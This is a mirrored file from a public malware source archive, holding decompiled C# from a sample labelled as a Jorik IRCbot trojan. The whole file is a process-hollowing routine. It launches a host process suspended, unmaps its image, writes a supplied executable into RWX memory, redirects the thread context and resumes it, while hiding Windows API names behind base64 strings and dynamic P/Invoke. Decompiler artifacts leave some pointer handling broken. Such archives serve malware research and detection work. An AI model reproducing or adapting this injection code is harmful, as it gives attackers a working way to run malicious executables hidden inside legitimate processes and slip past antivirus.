mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
f2ac1ece55
add
161 lines
7.9 KiB
C#
161 lines
7.9 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: uqeyrwlquci0gyeo0qjxqcszc
|
|
// Assembly: 4ldbvrmz, Version=6.0.220.4, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 7CE81D78-4EC2-4D47-AD6D-9A598C5B77D4
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881.exe
|
|
|
|
using System;
|
|
using System.Reflection;
|
|
using System.Reflection.Emit;
|
|
using System.Runtime.InteropServices;
|
|
|
|
public static class uqeyrwlquci0gyeo0qjxqcszc
|
|
{
|
|
private const uint CONTEXT_FULL = 65543;
|
|
private const int CREATE_SUSPENDED = 4;
|
|
private const int MEM_COMMIT = 4096;
|
|
private const int MEM_RESERVE = 8192;
|
|
private const int PAGE_EXECUTE_READWRITE = 64;
|
|
private const ushort IMAGE_DOS_SIGNATURE = 23117;
|
|
private const uint IMAGE_NT_SIGNATURE = 17744;
|
|
|
|
public static unsafe bool Vbm2knor525p1x3t5q2zsdbhh(
|
|
byte[] exeBuffer,
|
|
string hostProcess,
|
|
string optionalArguments)
|
|
{
|
|
byte[] dst1 = new byte[40];
|
|
byte[] dst2 = new byte[248];
|
|
byte[] dst3 = new byte[64];
|
|
int[] numArray1 = new int[4];
|
|
byte[] numArray2 = new byte[716];
|
|
fixed (byte* numPtr = &dst1[0])
|
|
;
|
|
fixed (byte* numPtr = &dst2[0])
|
|
;
|
|
fixed (byte* numPtr = &dst3[0])
|
|
;
|
|
fixed (byte* numPtr = &numArray2[0])
|
|
;
|
|
// ISSUE: fixed variable is out of scope
|
|
*(int*) numPtr = 65543;
|
|
Buffer.BlockCopy((Array) exeBuffer, 0, (Array) dst3, 0, dst3.Length);
|
|
// ISSUE: fixed variable is out of scope
|
|
if (*(ushort*) numPtr != (ushort) 23117)
|
|
return false;
|
|
// ISSUE: fixed variable is out of scope
|
|
int srcOffset = *(int*) (numPtr + 60);
|
|
Buffer.BlockCopy((Array) exeBuffer, srcOffset, (Array) dst2, 0, dst2.Length);
|
|
// ISSUE: fixed variable is out of scope
|
|
if (*(uint*) numPtr != 17744U)
|
|
return false;
|
|
string str = ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("");
|
|
if (!string.IsNullOrEmpty(optionalArguments))
|
|
str = hostProcess + " " + optionalArguments;
|
|
if (!uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<bool>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("Q3JlYXRlUHJvY2Vzcw=="), new Type[10]
|
|
{
|
|
typeof (string),
|
|
typeof (string),
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (bool),
|
|
typeof (int),
|
|
typeof (IntPtr),
|
|
typeof (string),
|
|
typeof (byte[]),
|
|
typeof (int[])
|
|
}, (object) hostProcess, (object) str, (object) IntPtr.Zero, (object) IntPtr.Zero, (object) false, (object) 4, (object) IntPtr.Zero, null, (object) new byte[68], (object) numArray1))
|
|
return false;
|
|
// ISSUE: fixed variable is out of scope
|
|
IntPtr num1 = new IntPtr(*(int*) (numPtr + 52));
|
|
int num2 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRVbm1hcFZpZXdPZlNlY3Rpb24="), new Type[2]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[0], (object) num1);
|
|
// ISSUE: fixed variable is out of scope
|
|
if (uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<IntPtr>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("VmlydHVhbEFsbG9jRXg="), new Type[5]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (uint),
|
|
typeof (int),
|
|
typeof (int)
|
|
}, (object) (IntPtr) numArray1[0], (object) num1, (object) *(uint*) (numPtr + 80), (object) 12288, (object) 64) == IntPtr.Zero)
|
|
uqeyrwlquci0gyeo0qjxqcszc.Vbm2knor525p1x3t5q2zsdbhh(exeBuffer, hostProcess, optionalArguments);
|
|
fixed (byte* numPtr = &exeBuffer[0])
|
|
{
|
|
// ISSUE: fixed variable is out of scope
|
|
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (uint),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[0], (object) num1, (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 84), (object) IntPtr.Zero);
|
|
}
|
|
// ISSUE: fixed variable is out of scope
|
|
for (ushort index = 0; (int) index < (int) *(ushort*) (numPtr + 6); ++index)
|
|
{
|
|
Buffer.BlockCopy((Array) exeBuffer, srcOffset + dst2.Length + dst1.Length * (int) index, (Array) dst1, 0, dst1.Length);
|
|
// ISSUE: fixed variable is out of scope
|
|
fixed (byte* numPtr = &exeBuffer[(IntPtr) *(uint*) (numPtr + 20)])
|
|
{
|
|
// ISSUE: fixed variable is out of scope
|
|
// ISSUE: fixed variable is out of scope
|
|
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (uint),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[0], (object) (IntPtr) ((long) (int) num1 + (long) *(uint*) (numPtr + 12)), (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 16), (object) IntPtr.Zero);
|
|
}
|
|
}
|
|
// ISSUE: fixed variable is out of scope
|
|
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRHZXRDb250ZXh0VGhyZWFk"), new Type[2]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr);
|
|
// ISSUE: fixed variable is out of scope
|
|
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (int),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[0], (object) (IntPtr) (long) *(uint*) (numPtr + 172), (object) num1, (object) 4, (object) IntPtr.Zero);
|
|
// ISSUE: fixed variable is out of scope
|
|
// ISSUE: fixed variable is out of scope
|
|
*(int*) (numPtr + 176) = (int) num1 + (int) *(uint*) (numPtr + 40);
|
|
// ISSUE: fixed variable is out of scope
|
|
int num3 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRTZXRDb250ZXh0VGhyZWFk"), new Type[2]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr);
|
|
int num4 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRSZXN1bWVUaHJlYWQ="), new Type[2]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[1], (object) IntPtr.Zero);
|
|
return true;
|
|
}
|
|
|
|
public static TR Ym0011n1sqree12pbi2kviopbv04c0hwt<TR>(
|
|
string name,
|
|
string method,
|
|
Type[] typeArr,
|
|
params object[] arguments)
|
|
{
|
|
ModuleBuilder moduleBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(new AssemblyName("temp"), AssemblyBuilderAccess.Run).DefineDynamicModule(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bW9kdWxl"));
|
|
moduleBuilder.DefinePInvokeMethod(method, name, MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.PinvokeImpl, CallingConventions.Standard, typeof (TR), typeArr, CallingConvention.Winapi, CharSet.Ansi).SetImplementationFlags(MethodImplAttributes.PreserveSig);
|
|
moduleBuilder.CreateGlobalFunctions();
|
|
return (TR) moduleBuilder.GetMethod(method).Invoke((object) null, arguments);
|
|
}
|
|
}
|